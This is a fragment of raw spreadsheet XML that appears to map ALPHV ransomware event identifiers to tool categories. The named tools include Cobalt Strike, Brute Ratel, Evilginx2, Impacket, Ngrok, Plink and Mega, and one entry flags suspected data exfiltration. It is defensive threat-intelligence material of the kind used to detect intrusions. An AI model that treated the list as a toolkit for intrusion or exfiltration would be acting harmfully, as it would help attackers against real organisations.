    <s v="Suspected data exfiltration"/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0117"/>
    <m/>
    <s v="htool"/>
    <s v="Impacket"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0119"/>
    <m/>
    <s v="htool"/>
    <s v="ADRecon"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0120"/>
    <s v="gmer-pid"/>
    <s v="htool"/>
    <s v="Gmer"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0121"/>
    <m/>
    <s v="htool"/>
    <s v="Evilginx2"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0122"/>
    <m/>
    <s v="c2"/>
    <s v="Brute Ratel"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0123"/>
    <m/>
    <s v="c2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0124"/>
    <m/>
    <s v="ppppp"/>
    <s v="Mega"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0126"/>
    <m/>
    <s v="htool"/>
    <s v="Plink"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0127"/>
    <m/>
    <s v="htool"/>
    <s v="Ngrok"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0128"/>
    <m/>
    <s v="htool"/>
    <s v="SplashTop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D0FB3-69F0-F143-A444-51C9B43A1782}" name="PivotTable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0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="6">
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="8">
        <item x="2"/>
        <item x="3"/>
        <item x="0"/>
        <item x="1"/>
        <item x="4"/>
        <item x="5"/>
        <item x="6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ap_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of eid_ty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29" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F129" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F129">
    <sortCondition ref="B1:B129"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_p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29"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="A45" workbookViewId="0">
      <selection activeCell="D121" sqref="D121"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.1640625" customWidth="1"/>
    <col min="2" max="2" width="21.5" customWidth="1"/>
    <col min="3" max="3" width="11.1640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="112.5" customWidth="1"/>
    <col min="5" max="5" width="52.83203125" customWidth="1"/>
    <col min="6" max="6" width="145.33203125" customWidth="1"/>
    <col min="7" max="7" width="103.3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ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>279</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>266</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>297</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>155</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>276</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>153</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>168</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>285</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>167</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>289</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>51</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>165</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>290</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>271</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>248</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>272</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>275</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>242</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>293</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>126</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>278</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>177</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>286</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>166</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>284</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>277</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>259</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>277</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>147</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>37</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>296</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>287</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>33</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>295</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>173</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>288</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>174</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>288</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>235</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>292</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>121</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>245</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>292</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>129</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>193</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>298</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>77</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>236</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>123</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>237</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>246</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>130</v>
      </c>
      <c r="E27" s="1"/>
      <c r="F27" s="1" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>201</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>86</v>
      </c>
      <c r="E28" s="1"/>
      <c r="F28" s="1" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>206</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>91</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>208</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>94</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>214</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>101</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>221</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>291</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>109</v>
      </c>
      <c r="E32" s="1"/>
      <c r="F32" s="1" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="153" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>6</v>
      </c>
      <c r="B33" s="1"/>
      <c r="C33" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>7</v>
      </c>
      <c r="E33" s="1"/>
      <c r="F33" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="34" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B34" s="1"/>
      <c r="C34" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E34" s="1"/>
      <c r="F34" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="35" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B35" s="1"/>
      <c r="C35" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E35" s="1"/>
      <c r="F35" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="36" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B36" s="1"/>
      <c r="C36" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E36" s="1"/>
      <c r="F36" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B37" s="1"/>
      <c r="C37" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E37" s="1"/>
      <c r="F37" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B38" s="1"/>
      <c r="C38" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E38" s="1"/>
      <c r="F38" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B39" s="1"/>
      <c r="C39" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E39" s="1"/>
      <c r="F39" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B40" s="1"/>
      <c r="C40" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E40" s="1"/>
      <c r="F40" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>35</v>
      </c>
      <c r="B41" s="1"/>
      <c r="C41" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E41" s="1"/>
      <c r="F41" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="136" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>159</v>
      </c>
      <c r="B42" s="1"/>
      <c r="C42" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>41</v>
      </c>
      <c r="E42" s="1" t="s">
        <v>42</v>
      </c>
      <c r="F42" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>160</v>
      </c>
      <c r="B43" s="1"/>
      <c r="C43" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E43" s="1"/>
      <c r="F43" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="44" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>161</v>
      </c>
      <c r="B44" s="1"/>
      <c r="C44" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E44" s="1"/>
      <c r="F44" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>162</v>
      </c>
      <c r="B45" s="1"/>
      <c r="C45" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E45" s="1"/>
      <c r="F45" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="102" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>163</v>
      </c>
      <c r="B46" s="1"/>
      <c r="C46" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>47</v>
      </c>
      <c r="E46" s="1"/>
      <c r="F46" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="47" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>164</v>
      </c>
      <c r="B47" s="1"/>
      <c r="C47" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E47" s="1"/>
      <c r="F47" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>169</v>
      </c>
      <c r="B48" s="1"/>
      <c r="C48" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E48" s="1"/>
      <c r="F48" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>170</v>
      </c>
      <c r="B49" s="1"/>
      <c r="C49" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E49" s="1"/>
      <c r="F49" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>171</v>
      </c>
      <c r="B50" s="1"/>
      <c r="C50" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E50" s="1"/>
      <c r="F50" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>172</v>
      </c>
      <c r="B51" s="1"/>
      <c r="C51" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E51" s="1"/>
      <c r="F51" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="52" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>175</v>
      </c>
      <c r="B52" s="1"/>
      <c r="C52" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>59</v>
      </c>
      <c r="E52" s="1"/>
      <c r="F52" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="53" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>176</v>
      </c>
      <c r="B53" s="1"/>
      <c r="C53" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E53" s="1"/>
      <c r="F53" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="54" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A54" s="1" t="s">
        <v>178</v>
      </c>
      <c r="B54" s="1"/>
      <c r="C54" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E54" s="1"/>
      <c r="F54" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="55" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>179</v>
      </c>
      <c r="B55" s="1"/>
      <c r="C55" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>63</v>
      </c>
      <c r="E55" s="1"/>
      <c r="F55" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="56" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A56" s="1" t="s">
        <v>180</v>
      </c>
      <c r="B56" s="1"/>
      <c r="C56" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E56" s="1"/>
      <c r="F56" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="57" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A57" s="1" t="s">
        <v>181</v>
      </c>
      <c r="B57" s="1"/>
      <c r="C57" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E57" s="1"/>
      <c r="F57" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>183</v>
      </c>
      <c r="B58" s="1"/>
      <c r="C58" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>67</v>
      </c>
      <c r="E58" s="1"/>
      <c r="F58" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="59" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A59" s="1" t="s">
        <v>184</v>
      </c>
      <c r="B59" s="1"/>
      <c r="C59" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D59" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E59" s="1"/>
      <c r="F59" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="60" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A60" s="1" t="s">
        <v>185</v>
      </c>
      <c r="B60" s="1"/>
      <c r="C60" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D60" s="1" t="s">
        <v>69</v>
      </c>
      <c r="E60" s="1"/>
      <c r="F60" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="61" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A61" s="1" t="s">
        <v>186</v>
      </c>
      <c r="B61" s="1"/>
      <c r="C61" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D61" s="1" t="s">
        <v>70</v>
      </c>
      <c r="E61" s="1"/>
      <c r="F61" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="62" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A62" s="1" t="s">
        <v>187</v>
      </c>
      <c r="B62" s="1"/>
      <c r="C62" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D62" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E62" s="1"/>
      <c r="F62" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="63" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A63" s="1" t="s">
        <v>188</v>
      </c>
      <c r="B63" s="1"/>
      <c r="C63" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D63" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E63" s="1"/>
      <c r="F63" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="64" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A64" s="1" t="s">
        <v>189</v>
      </c>
      <c r="B64" s="1"/>
      <c r="C64" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D64" s="1" t="s">
        <v>73</v>
      </c>
      <c r="E64" s="1"/>
      <c r="F64" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="65" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A65" s="1" t="s">
        <v>190</v>
      </c>
      <c r="B65" s="1"/>
      <c r="C65" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D65" s="1" t="s">
        <v>74</v>
      </c>
      <c r="E65" s="1"/>
      <c r="F65" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="66" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A66" s="1" t="s">
        <v>191</v>
      </c>
      <c r="B66" s="1"/>
      <c r="C66" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D66" s="1" t="s">
        <v>75</v>
      </c>
      <c r="E66" s="1"/>
      <c r="F66" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="67" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A67" s="1" t="s">
        <v>192</v>
      </c>
      <c r="B67" s="1"/>
      <c r="C67" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D67" s="1" t="s">
        <v>76</v>
      </c>
      <c r="E67" s="1"/>
      <c r="F67" s="1" t="s">
        <v>43</v>
      </c>
    </row>
